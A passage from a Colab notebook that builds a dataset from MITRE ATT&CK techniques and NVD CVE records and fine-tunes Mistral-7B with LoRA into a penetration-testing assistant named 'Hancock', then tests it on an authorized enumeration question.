letter to show if law enforcement contacts you\n\n**7. Data Handling**\n- How to handle any extracted data (encryption, storage, retention, deletion after report)"
  }
]

print(f'✅ Knowledge base: {len(KB_PAIRS)} Q&A pairs')


In [ ]:
# CELL 3: Fetch MITRE ATT&CK (691 techniques from MITRE CTI GitHub)
import requests, time

print('Fetching MITRE ATT&CK Enterprise...')
resp = requests.get(
    'https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json',
    timeout=90
)
bundle = resp.json()
mitre_pairs = []
for obj in bundle.get('objects', []):
    if obj.get('type') != 'attack-pattern': continue
    if obj.get('revoked') or obj.get('x_mitre_deprecated'): continue
    name = obj.get('name', '')
    desc = obj.get('description', '')
    detection = obj.get('x_mitre_detection', '')
    mitre_id = next((r['external_id'] for r in obj.get('external_references',[]) if r.get('source_name')=='mitre-attack'), '')
    tactics = ', '.join(p['phase_name'].replace('-',' ').title() for p in obj.get('kill_chain_phases',[]))
    if not name or len(desc) < 80: continue
    answer = f'**{name} ({mitre_id})**\nTactics: {tactics}\n\n{desc[:1000]}'
    if detection: answer += f'\n\n**Detection:**\n{detection[:500]}'
    mitre_pairs.append({
        'category': 'mitre',
        'user': f'Explain MITRE ATT&CK technique {name} ({mitre_id}) and how to detect and mitigate it.',
        'assistant': answer
    })
print(f'✅ MITRE ATT&CK: {len(mitre_pairs)} techniques')


In [ ]:
# CELL 4: Fetch NVD Critical/High CVEs
cve_pairs = []
for severity in ['CRITICAL', 'HIGH']:
    try:
        resp = requests.get(
            'https://services.nvd.nist.gov/rest/json/cves/2.0',
            params={'resultsPerPage': 100, 'cvssV3Severity': severity},
            timeout=30
        )
        time.sleep(0.7)
        for vuln in resp.json().get('vulnerabilities', []):
            cve = vuln.get('cve', {})
            cve_id = cve.get('id', '')
            desc_en = next((d['value'] for d in cve.get('descriptions', []) if d.get('lang')=='en'), '')
            if len(desc_en) < 60: continue
            metrics = cve.get('metrics', {})
            cvss = (metrics.get('cvssMetricV31',[{}])[0].get('cvssData',{}) or
                    metrics.get('cvssMetricV30',[{}])[0].get('cvssData',{}))
            score = cvss.get('baseScore', 0)
            answer = (f'**{cve_id}** — {severity} (CVSS {score})\n\n{desc_en}\n\n'
                      f'**Remediation:** Apply vendor patch. Monitor for exploitation in SIEM.')
            cve_pairs.append({
                'category': 'cve',
                'user': f'Analyze {cve_id} (CVSS {score} {severity}). What is the risk and how should it be remediated?',
                'assistant': answer
            })
        print(f'{severity}: {len([p for p in cve_pairs if severity in p["assistant"]])} CVEs')
    except Exception as e:
        print(f'{severity} failed: {e}')
print(f'✅ CVEs total: {len(cve_pairs)}')


In [ ]:
# CELL 5: Build JSONL + HuggingFace Dataset
from datasets import Dataset

all_pairs = KB_PAIRS + mitre_pairs + cve_pairs

def make_sample(pair):
    return {'messages': [
        {'role': 'system',    'content': HANCOCK_SYSTEM},
        {'role': 'user',      'content': pair['user']},
        {'role': 'assistant', 'content': pair['assistant']}
    ]}

samples = [make_sample(p) for p in all_pairs
           if len(p.get('user','')) > 10 and len(p.get('assistant','')) > 50]

with open('/content/hancock_pentest_v1.jsonl', 'w') as f:
    for s in samples:
        f.write(json.dumps(s, ensure_ascii=False) + '\n')

hf_ds = Dataset.from_list(samples)
split  = hf_ds.train_test_split(test_size=0.05, seed=42)
train_ds, eval_ds = split['train'], split['test']
print(f'✅ Dataset: {len(samples)} samples | Train: {len(train_ds)} | Eval: {len(eval_ds)}')


## Step 2: Load Model & Fine-Tune

In [ ]:
# CELL 6: Load Mistral 7B with unsloth (4-bit)
from unsloth import FastLanguageModel

MODEL = 'mistralai/Mistral-7B-Instruct-v0.3'
MAX_SEQ = 2048

print(f'Loading {MODEL} in 4-bit...')
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name=MODEL,
    max_seq_length=MAX_SEQ,
    dtype=None,
    load_in_4bit=True,
)
model = FastLanguageModel.get_peft_model(
    model,
    r=16,
    target_modules=['q_proj','k_proj','v_proj','o_proj','gate_proj','up_proj','down_proj'],
    lora_alpha=32,
    lora_dropout=0.05,
    bias='none',
    use_gradient_checkpointing='unsloth',
    random_state=42,
)
print('✅ Model loaded with LoRA')


In [ ]:
# CELL 7: Apply Mistral chat template
def apply_template(sample):
    text = tokenizer.apply_chat_template(
        sample['messages'], tokenize=False, add_generation_prompt=False
    )
    return {'text': text}

train_fmt = train_ds.map(apply_template, remove_columns=['messages'])
eval_fmt  = eval_ds.map(apply_template,  remove_columns=['messages'])
print('Sample (first 300 chars):')
print(train_fmt[0]['text'][:300])


In [ ]:
# CELL 8: Fine-tune Hancock
from trl import SFTTrainer
from transformers import TrainingArguments

training_args = TrainingArguments(
    output_dir='/content/hancock-adapter',
    num_train_epochs=1,
    max_steps=400,               # ~60-90 min on T4
    per_device_train_batch_size=2,
    gradient_accumulation_steps=4,  # effective batch size = 8
    warmup_steps=20,
    learning_rate=2e-4,
    fp16=True,
    logging_steps=20,
    evaluation_strategy='steps',
    eval_steps=100,
    save_strategy='steps',
    save_steps=200,
    load_best_model_at_end=True,
    optim='adamw_8bit',
    weight_decay=0.01,
    lr_scheduler_type='cosine',
    report_to='none',
)

trainer = SFTTrainer(
    model=model,
    tokenizer=tokenizer,
    train_dataset=train_fmt,
    eval_dataset=eval_fmt,
    dataset_text_field='text',
    max_seq_length=MAX_SEQ,
    args=training_args,
)

print('🚀 Starting Hancock fine-tuning...')
print(f'   {len(train_fmt):,} training samples | 400 steps | batch size 8')
trainer.train()
print('✅ Training complete!')


In [ ]:
# CELL 9: Save adapter
model.save_pretrained('/content/hancock-adapter')
tokenizer.save_pretrained('/content/hancock-adapter')
print('✅ Hancock LoRA adapter saved to /content/hancock-adapter')

# ── Save to Google Drive (recommended — persists after session) ──
# from google.colab import drive
# drive.mount('/content/drive')
# model.save_pretrained('/content/drive/MyDrive/CyberViser/hancock-adapter')
# tokenizer.save_pretrained('/content/drive/MyDrive/CyberViser/hancock-adapter')
# print('✅ Also saved to Google Drive')


## Step 3: Test Hancock

In [ ]:
# CELL 10: Chat with Hancock
FastLanguageModel.for_inference(model)

def ask_hancock(question):
    messages = [
        {'role': 'system', 'content': HANCOCK_SYSTEM},
        {'role': 'user',   'content': question},
    ]
    text   = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
    inputs = tokenizer(text, return_tensors='pt').to(model.device)
    out    = model.generate(**inputs, max_new_tokens=512, temperature=0.7, do_sample=True)
    return tokenizer.decode(out[0][len(inputs['input_ids'][0]):], skip_special_tokens=True)

# Test Hancock
print('Hancock:', ask_hancock(
    'I have authorized access to 192.168.1.100 running Windows Server 2019. '
    'What enumeration steps should I run first?'
))


In [ ]:
# CELL 11: Push to HuggingFace Hub (optional)
# Uncomment to publish hancock-adapter publicly or privately
# from huggingface_hub import login
# login(token='hf_YOUR_TOKEN_HERE')  # get from https://huggingface.co/settings/tokens
# model.push_to_hub('cyberviser/hancock-pentest-v1', private=True)
# tokenizer.push_to_hub('cyberviser/hancock-pentest-v1', private=True)
# print('✅ Hancock published to HuggingFace Hub')
print('Uncomment above to push Hancock to HuggingFace Hub')
